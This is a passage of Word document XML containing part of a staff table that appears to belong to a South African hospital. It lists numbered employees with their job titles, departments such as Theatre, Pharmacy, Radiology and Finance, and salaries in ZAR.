        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Cardiology</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ZAR 35,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Zanele Mahlangu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Nursing Sister</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Theatre</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ZAR 42,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Kagiso Sithole</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Pharmacist</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Pharmacy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ZAR 61,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Naledi Zulu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Pharmacy Assistant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Pharmacy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ZAR 26,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Themba Nkosi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Radiographer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Radiology</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ZAR 44,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Palesa Radebe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Radiographer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Radiology</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ZAR 43,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Deepak Pillay</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Lab Technologist</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Diagnostics Lab</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ZAR 41,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Kavitha Govender</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Lab Technician</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Diagnostics Lab</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ZAR 35,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Dr. Suresh Moodley</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Consultant Radiologist</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Radiology</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ZAR 130,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Dr. Fatima Patel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Pediatrician</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Pediatrics</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ZAR 118,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Nisha Singh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Physiotherapist</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Rehabilitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ZAR 48,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Dr. Vikram Chetty</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Anaesthetist</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Theatre</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ZAR 135,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>David Smith</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Facilities Manager</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ZAR 52,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Karen O'Connor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Billing Administrator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Finance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ZAR 29,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>27</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>James Wilson</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Security Supervisor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ZAR 27,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Linda Fourie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Receptionist</w:t>
            </w:r>
